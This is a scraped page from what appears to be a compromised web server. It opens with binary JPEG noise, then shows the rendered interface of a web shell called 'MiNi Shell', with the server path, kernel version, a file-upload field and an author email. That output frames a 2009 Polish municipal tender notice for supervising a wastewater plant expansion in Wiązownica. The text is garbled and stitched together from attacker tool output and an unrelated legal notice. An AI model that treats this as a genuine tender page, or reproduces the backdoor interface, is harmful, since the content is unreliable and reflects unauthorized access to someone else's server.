JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/155758-N-2009.html

<p class="kh_header"><b>Wiązownica: Pełnienie obowiązków inspektora nadzoru inwestycyjnego na zadaniu  
inwestycyjnym pn: Rozbudowa mechaniczno - biologicznej oczyszczalni ścieków w miejscowości Wiązownica oraz modernizacja SUW w Piwodzie</b><br>
<b>Numer ogłoszenia: 155758 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestycyjnego na zadaniu  
inwestycyjnym pn: Rozbudowa mechaniczno - biologicznej oczyszczalni ścieków w miejscowości Wiązownica oraz modernizacja SUW w Piwodzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków inspektora nadzoru inwestycyjnego na zadaniu  inwestycyjnym pn: Rozbudowa mechaniczno - biologicznej oczyszczalni ścieków w miejscowości Wiązownica oraz modernizacja SUW w Piwodzie.
W ramach planowanego zamówienia  wykonawca będzie sprawował nadzór inwestorski nad wykonaniem  następujących elementów robót: 
- przebudowa budynku socjalno - technicznego,
- przebudowa  i  rozbudowa budynku technicznego I,
- budowa budynku technicznego II,
- budowa 2 reaktorów i zbiornika,
- budowa zbiornika osadu nadmiernego,
- silos wapna,
Instalacje międzyobiektowe 
- sieć wodociągowa,
- sieć kanalizacji sanitarnej tłocznej,
- sieć kanalizacji sanitarnej grawitacyjnej,
- dostawa i montaż dmuchawy do płukania filtrów wraz z armaturą.
Do obowiązków wykonawcy związanych z pełnieniem nadzoru inwestorskiego będzie 
należało : 
- opiniowania   pod   względem   technicznym  umów   i  aneksów  do   umów    z wykonawcami robót;
- kontroli zgodności realizowanej inwestycji  budowlanej zgodnie z umową,  dokumentacją techniczną, pozwoleniem na budowę, zasadami wiedzy technicznej oraz  polskimi normami;
- sprawdzenie jakości wykonanych robót, jakości wbudowanych materiałów budowlanych  oraz eliminowania  wyrobów budowlanych niedopuszczonych do obrotu i stosowania w budownictwie;
- sprawdzenie  i odbiór robót ulegających zakryciu lub zanikających;
- dokumentowania czynności nadzoru wpisami do dziennika budowy;
- uzgadniania z Zamawiającym, wykonawcą i autorem projektu robót dodatkowych i zamiennych;
- odbioru  i sporządzenia protokołów branżowych;
- sprawdzania i zatwierdzenia kosztorysów i protokołów odbioru robót;
- udziału w odbiorze końcowym i przekazaniu do użytkowania;
- rozliczenia końcowego zadania inwestycyjnego;
- udziału w komisjach usterkowych poodbiorowych i w okresie rękojmi;
- prowadzenia nadzoru inwestycyjnego zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo bud. 
Wartość zamówienia  wynosi kwotę 6 829 843,63 zł. netto, która ustalona została na podstawie kosztorysu inwestorskiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  nie będzie wymagał wniesienia wadium przetargowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą   wziąć  udział  wykonawcy  nie wykluczeni na podstawie art. 24 ust.  1 i 2 oraz  spełniający  wymogi   art. 22  ust. 1  ustawy  Prawo Zamówień Publicznych i warunki dodatkowe określone w SIWZ.
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym 
i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- udokumentuje pełnienie obowiązków inspektora nadzoru inwestycyjnego   co najmniej 1  inwestycji - tj. oczyszczalni ścieków lub stacji uzdatniania wody,  o zakresie i wartości co najmniej 3 mln. zł. w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy, w tym okresie.  
- dysponuje 1 osobą   posiadającą  uprawnienia w specjalności konstrukcyjno - budowlanej  z doświadczeniem  w pełnieniu funkcji inspektora nadzoru  co najmniej  1 roboty budowlanej odpowiadającej  swoim zakresem i rodzajem robotom  stanowiącym przedmiot zamówienia,
- dysponuje  1 osobą  posiadającą uprawienia w specjalności  instalacyjno - 
 inżynieryjnej  w zakresie sieci i instalacji sanitarnych z doświadczeniem  w pełnieniu funkcji  inspektora nadzoru  co najmniej  1 roboty budowlanej odpowiadającej  swoim zakresem i rodzajem robotom  stanowiącym przedmiot zamówienia,
- dysponują 1 osobą  w specjalności instalacyjno - inżynieryjnej w zakresie sieci i instalacji elektrycznych z doświadczeniem  w pełnieniu funkcji inspektora nadzoru  co najmniej  1 roboty budowlanej odpowiadającej  swoim zakresem i rodzajem robotm  stanowiącym przedmiot zamówienia
- wskazane w ofercie osoby muszą posiadać aktualne zaświadczenie o przynależności do PIIB.
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
      Ocena spełniania warunków udziału w postępowaniu będzie prowadzona w oparciu o przedłożone dokumenty i oświadczenia na zasadzie spełnia/ nie spełnia.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
2.1. Wykonawców, którzy nie spełniają warunków o których mowa w art. 24 ust. 1 ustawy Prawo  zamówień publicznych, oraz wykonawców którzy;
2.1.1.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami  uczestniczącymi  w dokonywaniu tych czynności, chyba że udział tych 
wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2.1.2.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
2.1.3.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają   błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
2.1.4.	nie wnieśli wadium (jeżeli było wymagane), w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenie spełnienia warunków udziału w postępowaniu 
1. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności oraz nie  podlega wykluczeniu na podstawie art. 24ust. 1 i 2 ustawy z dnia 29 stycznia  2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty określone w rozporządzeniu Prezesa Rady Ministrów  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty  mogą być składane, a  w szczególności: 
1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2. aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.3. aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie  zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.4. oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 i 24 ust. 1 i 2  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- załącznik nr 4.

2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:
2.1. wykaz wykonanych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania usług nadzoru inwestorskiego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością usługom  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów referencje Inwestorów) potwierdzających,  że usługi nadzoru  zostały wykonane należycie; zał. nr 6
2.2. wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia a także zakresu wykonywanych przez nich czynności zał. nr 5
2.3. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt. 2.2.  wykonawca wskazał, którymi będzie dysponował- zał. Nr 7.
2.4. dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień; - do wykazu należy dołączyć  następujące dokumenty potwierdzające posiadanie przez wskazane osoby uprawnienia:
       2.4.1. decyzję o stwierdzeniu przygotowania do wykonywania samodzielnych funkcji w budownictwie dla osób wskazanych w ofercie,
 2.4.2. ważne zaświadczenie o przynależności  osób wymienionych w wykazie do  właściwej izby inżynierów budownictwa, 
oraz  pozostałe niezbędne dokumenty:
- formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
- kosztorys ofertowy (wycena usług)- zał. Nr 2
- parafowany projekt umowy  - zał. nr 3,
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych  za zgodność z oryginałem przez osobę / osoby uprawnioną do reprezentowania wykonawcy  we właściwym rejestrze lub ewidencji działalności gospodarczej. 
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1 ppkt. 1.1. - 1.4. składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty o których mowa w pkt. 1 i 2   powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu do składania ofert, natomiast dokument wymieniony w pkt. 3  powinien zostać wystawiony nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.

5. Wykonawcy wspólnie ubiegający  się o udzielenie zamówienia: 
5.1.W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego (konsorcjum) wykonawcy są  zobowiązani ustanowić pełnomocnika (lidera konsorcjum) do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy, które winno  zostać dołączone do oferty przetargowej.
5.2.Upoważnienie do pełnienia funkcji  PEŁNOMOCNIKA wymaga podpisu prawnie  
upoważnionych przedstawicieli każdego z partnerów w oryginale lub kopii potwierdzonych notarialnie - które należy również załączyć je do oferty; 
5.3.Treść pełnomocnictwa powinna dokładnie określać zakres  udzielonego pełnomocnictwa.
5.4.Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełnić warunki  udziału w postępowaniu określone w dziale VIII. w pkt. 1.1 i 1.4  i złożyć na potwierdzenie spełniania tych warunków dokumenty wymienione w Dziale IX w oryginale lub kopii  potwierdzone za  zgodność z  oryginałem.
5.5.Warunki udziału w postępowaniu o udzielenie zamówienia publicznego  opisane w Dziale VIII pkt. 1.2 i 1.3.   wykonawcy  mogą spełniać  wspólnie, przy czym dokumenty wymienione w dziale IX  pkt. 2 ppkt. 2.1. - 2.4.  muszą zostać złożone przez wszystkich wykonawców w oryginale  lub kopii  potwierdzone za  zgodność z  oryginałem. 
5.6.Ponadto  Pełnomocnik podpisuje także Formularz oferty , kosztorys zał. nr 2, wykaz  wykonanych usług- zał. nr 6,  wykaz  osób i podmiotów - zał. nr 5 i pozostałe dokumenty wymagane SIWZ.
5.7.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za  niewykonanie lub nienależyte wykonanie zobowiązań..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42  II p.
Cena SIWZ w wersji papierowej 10 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica
Sekretariat  pok. nr 22  I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com